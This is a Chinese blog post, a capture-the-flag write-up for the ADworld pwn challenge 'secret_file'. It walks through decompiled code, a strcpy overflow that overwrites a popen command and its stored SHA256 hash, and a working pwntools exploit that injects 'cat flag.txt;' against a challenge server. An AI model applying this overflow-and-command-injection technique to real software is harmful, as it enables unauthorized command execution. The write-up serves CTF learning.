ADworld pwn wp - secret_file

最新推荐文章于 2022-03-03 19:29:52 发布
最新推荐文章于 2022-03-03 19:29:52 发布
阅读量108 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/118303426
版权

正文

在这里插入图片描述

在这里插入图片描述
缺少libc动态链接文件, 搜索一下是openssl的一个开源库, 实现加密算法, 找不到方便的解决方法, 直接连服务器打题

在这里插入图片描述

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char *v3; // rax
  unsigned __int8 *v4; // rbp
  char *v5; // rbx
  __int64 v6; // rcx
  char *v7; // rdi
  unsigned int v8; // er12
  FILE *v9; // rbp
  size_t v11; // [rsp+0h] [rbp-308h] BYREF
  char *lineptr; // [rsp+8h] [rbp-300h] BYREF
  char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF
  char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF
  char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF
  _BYTE v16[32]; // [rsp+16Ch] [rbp-19Ch] BYREF
  char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF
  int v18; // [rsp+1CCh] [rbp-13Ch] BYREF
  char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
  unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]

  v20 = __readfsqword(0x28u);
  sub_E60(dest, a2, a3);
  v11 = 0LL;
  lineptr = 0LL;
  if ( getline(&lineptr, &v11, stdin) == -1 )
    return 1;
  v3 = strrchr(lineptr, 10);
  if ( !v3 )
    return 1;
  *v3 = 0;
  v4 = v16;
  v5 = v17;
  strcpy(dest, lineptr);
  sub_DD0(dest, v16, 256LL);
  do
  {
    v6 = *v4;
    v7 = v5;
    v5 += 2;
    ++v4;
    snprintf(v7, 3uLL, "%02x", v6);
  }
  while ( v5 != (char *)&v18 );
  v8 = strcmp(v15, v17);
  if ( v8 )
  {
    puts("wrong password!");
    return 1;
  }
  v9 = popen(v14, "r");
  if ( !v9 )
    return 1;
  while ( fgets(s, 256, v9) )
    printf("%s", s);
  fclose(v9);
  return v8;
}
涉及的函数解析
strchr

C 库函数 char *strchr(const char *str, int c) 在参数 str 所指向的字符串中搜索第一次出现字符 c(一个无符号字符)的位置

在这里插入图片描述

所以是将输入按换行符截断

sub_DD0
函数是对输入的字符串做SHA256处理, 保存在v16中

在这里插入图片描述

这里有溢出漏洞, 不过不是溢出到ret_addr, 而是可以溢出覆盖栈的数据

在这里插入图片描述

popen

搜索一下popen函数

头文件:#include <stdio.h>

定义函数:FILE * popen(const char * command, const char * type);

函数说明:popen()会调用fork()产生子进程,然后从子进程中调用/bin/sh -c 来执行参数command 的指令。

都相当于后门了, 所以这是个关键, 可以执行shell(command)

然后比较v15 和 v17字符串

在这里插入图片描述

再看看几个关键变量, dest, v14, v15, v17
在这里插入图片描述

从后往前逆向分析, 看到一开始dest会设置0x100个0, 然后是/bin/cat ./secret_data.asc9387a00e31e413c55af9c08c69cd119ab4685ef3bc8bcbe1cf82161119457127
在这里插入图片描述

漏洞利用

所以至此利用思路大致有个方向, 可以dest溢出覆盖v14, v15, v16, v17, 通过检测, 然后到达popen(command)执行popen(“ls;”)查看服务器上的文件列表, 应该会有flag文件, 然后再popen(“cat flag;”), 注意需要保留分号";", 而且popen函数通过调用fork产生一个子进程,通过shell执行传入的命令,这个进程必须通过pclose函数关闭,而不能是fclose函数

为了知道具体怎么操作, 需要彻底弄清程序的执行流
在这里插入图片描述
搜索得知_BYTE == unsigned char, 而v16是存储dest字符串哈希之后的结果, 而这个循环是将v16无符号数逐字节复制到v17数组, 然后底下要v15和v17比较, v15没有被程序操作, 但是要通过检测, 所以可以溢出到v15, 使得v17与v15相等, 也就是输入的字符串的哈希值, 溢出的同时使得v14 == "ls;" / "cat flag;", 即可执行命令

细化利用步骤
(1) 设置特定dest == b’z’ * 256
(2) 设置v14 == command
(3) 计算dest的SHA256值, 在溢出的同时设置给v15
(4) 通过if判断, 执行popen
(5) 得到文件列表
(6) 再次执行exp拿到flag

from pwn import *
import hashlib

context.log_level = "debug"
URL, PORT = "111.200.241.244", 53414 
io = remote(URL, PORT)

padding = b'z' * 0x100 
# payload = padding + b"ls;".ljust(27, b' ') + hashlib.sha256(padding).hexdigest().encode()
payload = padding + b"cat flag.txt;".ljust(27, b' ') + hashlib.sha256(padding).hexdigest().encode()

io.sendline(payload)
io.interactive()

在这里插入图片描述
在这里插入图片描述

总结

(1) popen函数

头文件:#include <stdio.h>
定义函数:FILE * popen(const char * command, const char * type);
函数说明:popen()会调用fork()产生子进程,
		然后从子进程中调用/bin/sh -c 来执行参数command 的指令。

(2) _BYTE
_BYTE == unsigned char

(3) strchr
C 库函数 char *strchr(const char *str, int c) 在参数 str 所指向的字符串中搜索第一次出现字符 c(一个无符号字符)的位置

(4) python3 str 和 bytes 的相互转换

s = "test"
b = s.encode()
s = b.decode()
fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2022年深信服杯四川省大学生信息安全技术大赛-CTF-Reverse复现(部分)
ookami6497的博客
11-14 1106
2022年深信服杯四川省大学生信息安全技术大赛-CTF-Reverse复现(Rush B)
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
在本文中,我们将深入探讨一个名为"adworld-wargame"的在线Pwn挑战,该挑战源自https://adworld.xctf.org.cn/task平台。这个挑战主要涉及Python编程语言,这意味着我们需要熟悉Python的内存管理和安全特性来成功解决...
xctf secret_file
doudoudedi
10-02 344
最近事情有点多我又做不来真是的唉 做到后面有种无力感 ~~ main函数 简而言之就是你输入一串数字sha256与系统的匹配正确也不会怎么样 我虽然我会sha256但是我会栈溢出阿!!! 关键在这里我们将前面的都覆盖然后将加上我们调试而知的正确sha256然后就是命令执行了,清楚的看见参数是在11b的位置 ython -c 'print "A"*0x100+"ls;".ljust(0x1B,...
secret_file(xctf)
weixin_43868725的博客
08-12 293
0x0 程序保护和流程 保护: 流程: main() 程序先在sub_E60()中给v14,v15赋值。 然后接收一行的数据存入lineptr中,将换行符换成\x00后将lineptr中的数据复制到dest中,通过sub_DD0()将dest处前0x100的字符串的sha256的摘要存入v16中。 之后将其转化为十六进制存入v17中,之后与v15中的值进行比较如果正确就执行popen函数参数为v14。 0x1 利用过程 1.通过对流程的分析,在getline对输入没有长度限制,导致了在strcpy函
[XCTF-pwn] 12-secret_file
weixin_52640415的博客
03-03 115
一个简单的内存溢出覆盖的题,要求输入数据与md5值比较通过,然后执行预存的命令。这里输入数据有溢出,通过溢出覆盖到v14命令和v15的md5值。 __int64 __fastcall main(int a1, char **a2, char **a3) { char *v3; // rax unsigned __int8 *v4; // rbp char *v5; // rbx __int64 v6; // rcx char *v7; // rdi unsigned int v8
secret_file分析
Eagle_hwei的博客
02-13 950
secret_file的题目分析 2020-02-1309:11:12 by hawkJW 题目附件、ida文件及wp链接   这道题就是一个简单的溢出问题,但是需要注意一些细节,这里进行说明一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,这里的保护措施全开,那么可能不能用普通的操作来解决问题。下面具体看一下程序的流程,如图所示 实际上,可...
ADworld pwn wp - hacknote
fa1c4的blog
08-30 188
前言 攻防世界的一道pwn, UAF漏洞 https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4717&page=2 分析过程 void __cdecl __noreturn main() { int v0; // eax char buf[4]; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch
ADworld pwn wp - pwn-200
fa1c4的blog
06-25 132
明显的栈溢出, 动态链接, 无libc利用, ret2libc, 板子打法, 用pwntools的DynELF模块泄露libc地址, 原理是结合puts或writes函数泄露地址, 所以有两个利用条件: 漏洞可以泄露libc地址 漏洞可以反复利用(ret 回到函数开头继续执行) write函数 头文件:#include <unistd.h> 定义函数:ssize_t write (int fd, const void * buf, size_t count); 函数说明:write(...
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
pwntools中fmtstr的使用
fa1c4的blog
02-01 3801
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3234
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
kali安装checksec
fa1c4的blog
01-26 3213
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3020
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2895
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
Ubuntu安装checksec
fa1c4的blog
04-15 2538
环境配置, 纯命令行解决. # install git sudo apt-get install git ### cd git clone https://github.com/slimm609/checksec.sh sudo ln -sf ~/checksec.sh/checksec /usr/local/bin/checksec 经测试, 适用大部分版本Ubuntu.
确认main_arena相对libc的偏移地址
fa1c4的blog
08-26 2467
前言 打保护全开的堆题时碰到的问题, 大佬wp直接给exp, 但是奈何萌新很多细节不懂啊 现在记录一下寻找main_arena相对libc偏移的方法(又水一篇博客) 在0CTF 2017 babyheap这题中, 利用 fast chunk 和 small chunk 堆叠技术将main_arena的实际地址泄露出来, 另外通过这个相对偏移, 计算libc的加载基址, 完成libc泄露 过程 对照看下mallo.c的源码 方法一 逆向分析libc.so文件 拖进IDA 函数框搜索malloc_trim
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值